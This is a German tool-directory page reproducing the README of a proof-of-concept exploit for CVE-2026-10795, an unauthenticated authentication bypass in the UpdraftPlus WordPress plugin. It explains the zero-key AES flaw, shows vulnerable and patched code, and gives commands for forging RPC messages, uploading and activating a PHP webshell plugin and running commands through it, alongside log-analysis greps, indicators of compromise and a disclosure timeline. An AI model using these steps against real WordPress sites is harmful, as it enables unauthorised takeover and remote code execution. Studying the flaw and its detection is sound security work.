Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-10795 — CVE-2026-10795 – UpdraftPlus Authentifizierungsumgehung | Kitploit
Tools/GitHubGitHub/izxci/cve-2026-10795
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubizxci/cve-2026-10795

CVE-2026-10795

CVE-2026-10795 – UpdraftPlus Authentifizierungsumgehung

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-10795

CVE-2026-10795 – UpdraftPlus Authentifizierungsumgehung

CVE-2026-10795 – UpdraftPlus Authentifizierungsumgehung PoC

⚠️ Haftungsausschluss: Dieses Repository dient ausschließlich zu Bildungszwecken.
Verwenden Sie dies nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben.
Der Autor ist nicht verantwortlich für jeglichen Missbrauch.


📋 Übersicht

FeldDetails
PluginUpdraftPlus: WP Backup & Migration
Betroffene Versionen≤ 1.26.4
Gepatchte Version1.26.5
CVSS-Score8.1 (Hoch)
SchwachstellentypUnauthenticated Authentication Bypass → RCE
Entdeckt vonvtim (Wordfence Bug Bounty)
Prämie$5.200

🔍 Zusammenfassung der Schwachstelle

UpdraftPlus registriert einen unauthenticated RPC-Listener bei jedem Seitenaufruf für Seiten, die mit UpdraftCentral verbunden sind.

Die Funktion decrypt_message() validiert den Rückgabewert von $rsa->decrypt() nicht.
Wenn die RSA-Entschlüsselung fehlschlägt, wird false an Rijndael::setKey() übergeben, was zu einem deterministischen AES-128-Schlüssel aus lauter Nullen führt.

Ein Angreifer kann:

  1. Eine udrpc_message mit dem Nullschlüssel fälschen
  2. Den Server dazu bringen, sie erfolgreich zu entschlüsseln
  3. Beliebige RPC-Befehle als der verbundene Administrator ausführen
  4. Ein schädliches Plugin hochladen und aktivieren → Remote Code Execution

🧬 Angreifbarer Code

root@kitploit:~
// updraftplus/includes/class-remote-communications-v2.php
// Zeilen 460-491 (Version 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// ❌ Keine Rückgabewertprüfung!

$rij->setKey($sym_key);  // false → Nullschlüssel
return $rij->decrypt($ciphertext);

✅ Korrigierter Code

root@kitploit:~
$sym_key = $rsa->decrypt($sym_key);

// ✅ Hinzugefügt in 1.26.5
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
    return false;
}

$rij->setKey($sym_key);
return $rij->decrypt($ciphertext);

📁 Repository-Struktur

root@kitploit:~
updraftplus-auth-bypass/
├── README.md
├── poc.py                  # Haupt-Exploit-Skript
├── requirements.txt        # Python-Abhängigkeiten
├── payloads/
│   ├── list_plugins.py     # Installierte Plugins auflisten
│   ├── upload_shell.py     # Webshell-Plugin hochladen
│   └── activate_plugin.py  # Hochgeladenes Plugin aktivieren
├── shell/
│   ├── build_shell.py      # Baut Webshell-ZIP
│   └── test-shell.php      # Minimale PHP-Webshell
└── docs/
    ├── technical-analysis.md
    └── patch-diff.md

⚙️ Installation

root@kitploit:~
git clone https://github.com/yourname/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests==2.31.0
pycryptodome==3.20.0

🧪 Testumgebung einrichten

1. XAMPP installieren

root@kitploit:~
https://www.apachefriends.org
Starten: Apache + MySQL

2. WordPress + UpdraftPlus 1.26.4 installieren

root@kitploit:~
# WordPress in htdocs platzieren
C:/xampp/htdocs/wordpress/

# Angreifbare Plugin-Version installieren
# Herunterladen: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4

3. Mit UpdraftCentral verbinden

root@kitploit:~
WordPress Admin → Einstellungen → UpdraftPlus → UpdraftCentral-Tab → Verbinden

⚠️ Erforderlich: Die Seite muss mit UpdraftCentral verbunden sein, damit die Schwachstelle ausnutzbar ist.


🚀 Nutzung

Grundlegende Nutzung

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --user-id 1

Plugins auflisten

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins

Webshell hochladen

root@kitploit:~
# Schritt 1: ZIP der Shell erstellen
python shell/build_shell.py

# Schritt 2: Hochladen
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# Schritt 3: Aktivieren
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# Schritt 4: RCE testen
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"

🔬 Funktionsweise

root@kitploit:~
poc.py
  │
  ├─ 1. Fehlerhafte RSA-verschlüsselte sym_key erstellen (Müllbytes)
  │
  ├─ 2. RPC-Payload mit NULL AES-128-Schlüssel (0x00 * 16) verschlüsseln
  │
  ├─ 3. udrpc_message bauen:
  │       [3-Byte hex Länge][fake_sym_key][16-Byte hex Cipherlänge][Ciphertext]
  │
  ├─ 4. POST an Ziel senden (keine Authentifizierung, kein Nonce, keine Cookies nötig)
  │
  └─ 5. Serverseite:
          rsa->decrypt(Müll) → false
          setKey(false)      → 0x00-Schlüssel
          decrypt(ciphertext) → unsere Payload ✅
          wp_set_current_user() → Admin-Zugriff
          RPC-Befehl ausgeführt → RCE 💀

🛡️ Erkennung & Gegenmaßnahmen

Gegenmaßnahmen

root@kitploit:~
UpdraftPlus sofort auf Version 1.26.5 aktualisieren.

Erkennung (Log-Analyse)

root@kitploit:~
# Nach verdächtigen POST-Anfragen mit udrpc_message suchen
grep "udrpc_message" /var/log/apache2/access.log

# Wordfence-Benutzer sind seit dem 3. Juni 2026 geschützt

Kompromittierungsindikatoren

root@kitploit:~
- Unerwartete Plugin-Installationen
- Neue PHP-Dateien in wp-content/plugins/
- POST-Anfragen an das WordPress-Root mit dem Parameter udrpc_message
- Unerwartete Aktionen auf Admin-Ebene in WordPress-Logs

📅 Offenlegungszeitplan


📚 Referenzen

  • Wordfence Advisory
  • UpdraftPlus Plugin-Seite
  • phpseclib RSA-Dokumentation
  • Plugin-Änderungsprotokoll

👤 Danksagungen

  • Ursprüngliche Entdeckung: vtim (Wordfence Bug Bounty Program)
  • PoC-Autor: izxci
  • Zweck: Bildung / Sicherheitsforschung

📜 Lizenz

root@kitploit:~
MIT-Lizenz – Nur für Bildungszwecke.
Unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören, ist illegal.
Tool herunterladen
DatumEreignis
1. Juni 2026Schwachstelle über Wordfence Bug Bounty eingereicht
3. Juni 2026Bestätigt & an den Anbieter weitergegeben
3. Juni 2026Wordfence Premium-Firewall-Regel bereitgestellt
4. Juni 2026Anbieter hat bestätigt
5. Juni 2026Patch veröffentlicht (v1.26.5)
3. Juli 2026Wordfence Free-Schutz aktiv